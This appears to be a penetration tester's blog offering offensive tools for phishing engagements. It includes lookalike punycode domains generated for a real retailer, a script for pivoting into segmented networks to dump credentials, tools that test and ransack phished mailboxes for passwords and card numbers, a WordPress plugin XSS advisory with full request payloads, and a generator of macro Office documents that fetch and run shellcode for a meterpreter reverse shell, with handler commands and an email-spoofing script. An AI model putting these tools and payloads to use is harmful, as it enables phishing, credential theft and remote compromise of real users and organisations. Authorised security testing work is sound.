Punycode Phishing Domains Generator

November 9, 2017 Leave a comment

I wrote a simple script that can generate Pnnycode domain names that I can use during phishing tests.
The issue with Punycode is that an attacker can create a spoof website with a URL that looks exactly the same like the real website.  It relies on the way that many browsers interpret punycode.

Firefox and Safari seems to be vulnerable to punycode phishing attack currently.

There are around 80 similar looking domains being generated by the script.


$ python genPunycodeDomain.py -d uniqlo.com

uniqlo.com          uniqlo.com [54.199.235.240]
unïqlo.com          xn--unqlo-dta.com [available]
unìqlo.com          xn--unqlo-usa.com [available]
uníqlo.com          xn--unqlo-0sa.com [available]
uniqlö.com          xn--uniql-nua.com [available]
uniqlò.com          xn--uniql-yta.com [available]
uniqló.com          xn--uniql-4ta.com [available]
üniqlo.com          xn--niqlo-jva.com [available]
ùniqlo.com          xn--niqlo-0ua.com [available]
úniqlo.com          xn--niqlo-6ua.com [available]
uniql0.com          uniql0.com [153.122.57.60]
unïqlö.com          xn--unql-6pa8b.com [available]
unïqlò.com          xn--unql-6pau.com [available]
unïqló.com          xn--unql-6pa0a.com [available]
ünïqlo.com          xn--nqlo-5pa0f.com [available]
ùnïqlo.com          xn--nqlo-5pa2d.com [available]
únïqlo.com          xn--nqlo-5pa8d.com [available]
unïql0.com          xn--unql0-dta.com [available]
unìqlö.com          xn--unql-rpa6d.com [available]
unìqlò.com          xn--unql-rpa2b.com [available]
unìqló.com          xn--unql-rpa8b.com [available]
ünìqlo.com          xn--nqlo-qpa8g.com [available]
ùnìqlo.com          xn--nqlo-qpa0f.com [available]
únìqlo.com          xn--nqlo-qpa6f.com [available]
unìql0.com          xn--unql0-usa.com [available]
uníqlö.com          xn--unql-wpa0d.com [available]
uníqlò.com          xn--unql-wpa6a.com [available]
uníqló.com          xn--unql-wpa2b.com [available]
üníqlo.com          xn--nqlo-vpa2g.com [available]
ùníqlo.com          xn--nqlo-vpa4e.com [available]
úníqlo.com          xn--nqlo-vpa0f.com [available]
uníql0.com          xn--unql0-0sa.com [available]
üniqlö.com          xn--niql-8qa5a.com [available]
ùniqlö.com          xn--niql-8qan.com [available]
úniqlö.com          xn--niql-8qat.com [available]
üniqlò.com          xn--niql-oqa9c.com [available]
ùniqlò.com          xn--niql-oqa1b.com [available]
úniqlò.com          xn--niql-oqa7b.com [available]
üniqló.com          xn--niql-tqa3c.com [available]
ùniqló.com          xn--niql-tqa5a.com [available]
úniqló.com          xn--niql-tqa1b.com [available]
üniql0.com          xn--niql0-jva.com [available]
ùniql0.com          xn--niql0-0ua.com [available]
úniql0.com          xn--niql0-6ua.com [available]
ünïqlö.com          xn--nql-zma1b5a.com [available]
ùnïqlö.com          xn--nql-zma1bn.com [available]
únïqlö.com          xn--nql-zma1bt.com [available]
ünïqlò.com          xn--nql-zmar9c.com [available]
ùnïqlò.com          xn--nql-zmar1b.com [available]
únïqlò.com          xn--nql-zmar7b.com [available]
ünïqló.com          xn--nql-zmaw3c.com [available]
ùnïqló.com          xn--nql-zmaw5a.com [available]
únïqló.com          xn--nql-zmaw1b.com [available]
ünïql0.com          xn--nql0-5pa0f.com [available]
ùnïql0.com          xn--nql0-5pa2d.com [available]
únïql0.com          xn--nql0-5pa8d.com [available]
ünìqlö.com          xn--nql-nma6c5a.com [available]
ùnìqlö.com          xn--nql-nma6cn.com [available]
únìqlö.com          xn--nql-nma6ct.com [available]
ünìqlò.com          xn--nql-nma6a5c.com [available]
ùnìqlò.com          xn--nql-nma6azb.com [available]
únìqlò.com          xn--nql-nma6a5b.com [available]
ünìqló.com          xn--nql-nma1bzc.com [available]
ùnìqló.com          xn--nql-nma1b5a.com [available]
únìqló.com          xn--nql-nma1bzb.com [available]
ünìql0.com          xn--nql0-qpa8g.com [available]
ùnìql0.com          xn--nql0-qpa0f.com [available]
únìql0.com          xn--nql0-qpa6f.com [available]
üníqlö.com          xn--nql-rma1c5a.com [available]
ùníqlö.com          xn--nql-rma1cn.com [available]
úníqlö.com          xn--nql-rma1ct.com [available]
üníqlò.com          xn--nql-rma1a9c.com [available]
ùníqlò.com          xn--nql-rma1a1b.com [available]
úníqlò.com          xn--nql-rma1a7b.com [available]
üníqló.com          xn--nql-rma6azc.com [available]
ùníqló.com          xn--nql-rma6a5a.com [available]
úníqló.com          xn--nql-rma6azb.com [available]
üníql0.com          xn--nql0-vpa2g.com [available]
ùníql0.com          xn--nql0-vpa4e.com [available]
úníql0.com          xn--nql0-vpa0f.com [available]

The domain on the left column is how the domain will appear in the browser’s location bar.
The domain on the right column is the domain to use/register.
If the domain is already in use, the IP address will appear next to the domain in the output above.

I hope this can be useful to some of you during your phishing tests.

The link to the source code is available at https://gist.github.com/milo2012/889752dadbf2d45c8e96d4a096a1736d

Below are some references to phishing with punycode.
https://www.xudongz.com/blog/2017/idn-phishing/
Phishing with ‘punycode’ – when foreign letters spell English words

Advertisements
Categories: Uncategorized

Jumping from Corporate to Compromising Semi-Isolated Network

September 21, 2017 1 comment

Finding and attacking hosts in Semi-Isolated networks
The new script ‘hopandhack‘ can be used by attackers to automatically find and hunt down hosts that are not directly accessible from the attacker’s machine.  In some organizations, IT administrators have to use something called a ‘jump box’ or VPN to access the secure data centre or PCI network where sensitive data are stored .

The ‘hopandhack’ script automates the process of finding hosts with the necessary routes to these secure network and compromises them.  The functionality of hopandhack will be incorporated into Portia in the next week or so.

hopandhack script can be found at https://github.com/SpiderLabs/portia under the filename ‘hopandhack.py’.

Basic Workflow of how the attack works.

Below is a video demo as presented at Rootcon (2017).  In the video, the attacker is able to access one host (host A) but not the other host (host B) thats in the secure network.

Host A has an active route to host B.  In order to compromise host B, the attacker has to setup a relay from host A to host B and then use this relay to dump credentials/hashes from host B.

More functionalities will be added in future.

The tool is currently available as a standalone tool and its functionalities will be ported over to Portia in the following week.
https://github.com/SpiderLabs/portia/blob/master/hopandhack.py

The slides from Rootcon 2017 is available at https://www.slideshare.net/secret/tkQFhYeFY3zEi4

Portia GitHub link

July 30, 2017 Leave a comment

Below is the updated GitHub link for Portia https://github.com/SpiderLabs/portia

Categories: Uncategorized

Quick Script to Test Domain Credentials on OWA (Outlook Web Access) Site

#If you need to quickly test the credentials captured from a OWA site during a phishing test, the below script might come in handy.

#Script can be downloaded from the below URL
https://gist.githubusercontent.com/milo2012/885ecbd98f9407b2121884afee837eb5/raw/81be14c2242a7389fe27e583b006fb3da4d0a89b/testOWA.py

#Example
$ python testOWA.py -f /tmp/creds.txt -c , -s mail.exchangeserver.com -n 20

#Format of creds.txt
user1@domain.com domain\user1 Password1

Categories: Phishing

owaDump – Another tool to use during Phishing Campaigns

October 20, 2016 Leave a comment

There were a number of tools available in the Internet for attacking Exchange/Outlook Web Access.

Below are some of them that I have used before.
1) OWA-Toolkit (https://github.com/Shellntel/OWA-Toolkit#owa-toolkit)
2) Metasploit Outlook Web Access (OWA) Bruteforce Utility (https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login)
3) OWABF (http://web.archive.org/web/20150429003843/http://sla.ckers.org/forum/read.php?12,26944)
4) PEAS (https://github.com/mwrlabs/peas)
5) MailSniper (https://github.com/dafthack/MailSniper)

During a phishing test, other than attempting to gain further access to the target’s network via HTA powershell, exploiting out-of-date browser plugins and etc, another interesting thing to look at are targets’ email accounts.

If we have captured more than 50 to 100 credentials via the phishing test, it might not be feasible to ransack the mailboxes one at a time manually.

I needed a simple tool (that I can write in a couple of hours) to search the mailboxes of users for PAN (VISA and MasterCard) numbers, passwords or even specific keywords.

As there were tons of resources on the Internet regarding Exchange Web Services (EWS) for C#, I decided to write the tool in C# instead of the usual Python/Ruby and use mono to run the executable on OSX and Linux. I have tested this on OSX and Win32.

Mono can be downloaded from http://www.mono-project.com/download/.

It should work on all versions of OWA.
Please let me know if you face any issues.

$ mono owaDump.exe -h
-u, –user       Required. Email Address
-p, –pass       Required. Password
-f, –file       Text File (Email|Password) Per Line
-k, –keyword    Text to Search
–pan            (Default: False) Find PAN numbers
-d               (Default: False) Debug Mode
-h, –help       (Default: False) Print This Help Menu

Below are some ways you can use the tool.
In the below example, keywords such as password, creds, credentials, ssn, credit card are used as search terms.

$ mono owaDump.exe -u keith@company.com -p Password#

Checking: keith@company.com
[Subject]: RE [WARNING :  MESSAGE ENCRYPTED]
[Subject]: RE [WARNING :  Test Mail]

If you check the current folder, you will see the below files.
Emails and attachments that we found to be matching the search terms were downloaded.

$ ls
keith_Inbox1.eml
keith_Inbox2.eml

If you would like to search for PAN numbers, you can use the –pan keyword.

$ mono owaDump.exe -u keith@company.com -p ‘Password’ –pan
Checking: keith@company.com
…………………..
[PAN] PAN Number found in keith_Inbox3.eml

If you have a list of email addresses and passwords which you captured from a phishing test or a dump from the Domain Controller, you can use the below.

Below is the format of the text file if you want to target multiple accounts.

$ cat creds.txt
keith@company.com|password1
keith1@company.com|password2

$ mono owaDump.exe -f creds.txt
Checking: keith@company.com
[Subject]: RE [WARNING :  MESSAGE ENCRYPTED]
[Subject]: RE [WARNING :  Test Mail]

Checking: keith1@company.com
[Subject]: RE [WARNING :  MESSAGE ENCRYPTED]
[Subject]: RE [WARNING :  Test Mail]

The source code is available for download at https://github.com/milo2012/owaDump.

If you needed a compiled version of the executable, it is available at https://github.com/milo2012/owaDump/releases.

This is a pre-release.  Please send me your comments and suggestions.

Thank you for reading.

 

XSS issue in WordPress Plugin: Newsletter Version 4.6.0

October 13, 2016 Leave a comment
I recently reported a Cross-Site Scripting (XSS), Reflected issue for WordPress Plugin: Newsletter 4.6.0 https://wordpress.org/plugins/newsletter/ to plugins@wordpress.org.

 

The developers have since released a patch for the plugin (version 4.6.1) (see https://wordpress.org/plugins/newsletter/changelog/ for more information).

1. Stored Cross-Site Scripting (XSS)
Authenticated administrators can inject html/js code (there is no CSRF protection).
Method: POST
Vulnerable Parameter(s): 
options[list_1]
options[list_2]
options[list_3]
options[list_4]
options[list_5]
options[list_6]
options[list_7]
options[list_8]
options[list_9]
options[list_10]
options[list_11]
options[list_12]
options[list_13]
options[list_14]
options[list_15]
options[list_16]
options[list_17]
options[list_18]
options[list_19]
options[list_20]
Example Attack:
Request:
POST /wordpress/wp-admin/admin.php?page=newsletter_subscription_lists HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1762
act=save&btn=&_wpnonce=7cad5407b5&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dnewsletter_subscription_lists&options%5Blist_1%5D=test&options%5Blist_1_status%5D=1&options%5Blist_1_checked%5D=1&options%5Blist_2%5D=&options%5Blist_2_status%5D=0&options%5Blist_2_checked%5D=0&options%5Blist_3%5D=&options%5Blist_3_status%5D=0&options%5Blist_3_checked%5D=0&options%5Blist_4%5D=&options%5Blist_4_status%5D=0&options%5Blist_4_checked%5D=0&options%5Blist_5%5D=&options%5Blist_5_status%5D=0&options%5Blist_5_checked%5D=0&options%5Blist_6%5D=&options%5Blist_6_status%5D=0&options%5Blist_6_checked%5D=0&options%5Blist_7%5D=bi1x5alert(‘xss’)gjoce&options%5Blist_7_status%5D=0&options%5Blist_7_checked%5D=0&options%5Blist_8%5D=&options%5Blist_8_status%5D=0&options%5Blist_8_checked%5D=0&options%5Blist_9%5D=&options%5Blist_9_status%5D=0&options%5Blist_9_checked%5D=0&options%5Blist_10%5D=&options%5Blist_10_status%5D=0&options%5Blist_10_checked%5D=0&options%5Blist_11%5D=&options%5Blist_11_status%5D=0&options%5Blist_11_checked%5D=0&options%5Blist_12%5D=&options%5Blist_12_status%5D=0&options%5Blist_12_checked%5D=0&options%5Blist_13%5D=&options%5Blist_13_status%5D=0&options%5Blist_13_checked%5D=0&options%5Blist_14%5D=&options%5Blist_14_status%5D=0&options%5Blist_14_checked%5D=0&options%5Blist_15%5D=&options%5Blist_15_status%5D=0&options%5Blist_15_checked%5D=0&options%5Blist_16%5D=&options%5Blist_16_status%5D=0&options%5Blist_16_checked%5D=0&options%5Blist_17%5D=&options%5Blist_17_status%5D=0&options%5Blist_17_checked%5D=0&options%5Blist_18%5D=&options%5Blist_18_status%5D=0&options%5Blist_18_checked%5D=0&options%5Blist_19%5D=&options%5Blist_19_status%5D=0&options%5Blist_19_checked%5D=0&options%5Blist_20%5D=&options%5Blist_20_status%5D=0&options%5Blist_20_checked%5D=0
Response:
HTTP/1.1 200 OK
Date: Wed, 28 Sep 2016 17:40:12 GMT
Server: Apache
X-Powered-By: PHP/7.0.10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102536
Request:
GET /wordpress/wp-admin/admin.php?page=newsletter_users_massive HTTP/1.1
Host: localhost:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Response:
HTTP/1.1 200 OK
Date: Wed, 28 Sep 2016 17:40:37 GMT
Server: Apache
X-Powered-By: PHP/7.0.10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
X-UA-Compatible: IE=edge
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98989
For preference <select id=”options-list” name=”options[list]”><option value=”1″>(1) test</option><option value=”2″>(2) </option><option value=”3″>(3) </option><option value=”4″>(4) </option><option value=”5″>(5) </option><option value=”6″>(6) </option><option value=”7″>(7) bi1x5alert(‘xss’)gjoce</option><option value=”8″>(8)
unnamed
Categories: Uncategorized

Phishing Toys

February 1, 2016 Leave a comment

I wrote 2 scripts with the help of a co-worker that are useful in our social engineering engagements.

  • injectShell.py – This script generates Microsoft documents (VBA code) that uses Powershell to get a meterpreter reverse shell. This script works on a Linux/Mac machine unlike some scripts I found which requires a Windows machine. This works by patching the hex bytes (ip address and port) in the pre-generated office documents.
  • sendEmail.py – This script is useful in sending spoofed emails to some SMTP servers.

 

Check the below link for the Github repository
https://github.com/milo2012/Social-Engineering-Toys

 

 injectShell.py

The script generates office documents (xls, doc and ppt) that includes VBA code that downloads and run the Invoke-Shellcode.ps1 (creates a meterpreter reverse shell back to server) when the victim enables Macro in the document.

You will need to run the windows/meterpreter/reverse_https payload on your the attacker host.

$ ./msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST consulting.example.org
msf exploit(handler) > set LPORT 4443
msf exploit(handler) > set SessionCommunicationTimeout 0
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

Below is the help screen of the script.

$  python injectShell.py -h
usage: injectShell.py [-h] [-t T] [-o O] [-ip IP] [-port PORT]

optional arguments:
  -h, --help  show this help message and exit
  -t T        [xls|doc|ppt|all]
  -o O        [output filename (without extension)]
  -ip IP      [meterpreter listener ip address]
  -port PORT  [meterpreter listener port]

Below is the script in action.

$  python injectShell.py -t all -o salary -ip 192.168.1.6 -port 1111 
- Generated: salary.xls
- Generated: salary.doc
- Generated: salary.ppt

sendEmail.py
This script is useful in sending spoofed emails to some SMTP servers. This can be useful in social engineering engagements.

Below is the help screen of the script.

$ python sendEmail.py -h
usage: sendEmail.py [-h] [-f F] [-n N] [-e E] [-t T] [-iL IL] [-v]

optional arguments:
  -h, --help  show this help message and exit
  -f F        [html file containing the email body]
  -n N        [recipient name]
  -e E        [recipient email]
  -t T        [delay between 1 to x seconds (random)]
  -iL IL      [file containing recipient name and email addresses per line
              separated by comma]
  -v          [verbose]

Below is the script in action.

$ python sendEmail.py -iL namelist.txt -f sampleHtml.txt -t 10
Sending email to: test01@example.com  

You can use keywords like @trackingCode and @user in HTML emails which will be replaced by the values listed in namelist.txt. (See sampleHTML.txt for an example of the usage of two keywords)

  • @user is the victim’s name (1st field in namelist.txt)
  • @trackingCode is the individual codes assigned to per victim email address in Phishing Frenzy (3rd field in namelist.txt)

Below are two sample formats of namelist.txt
Below is sample 1
The fields are separated by “,”
The first field is: recipient’s name
The second field is: recipient’s email address

Keith,keith123@hotmail.com

Below is sample 2
The first field is: recipient’s name
The second field is: recipient’s email address
The last field is: tracking code

Keith,keith123@hotmail.com,UAG21E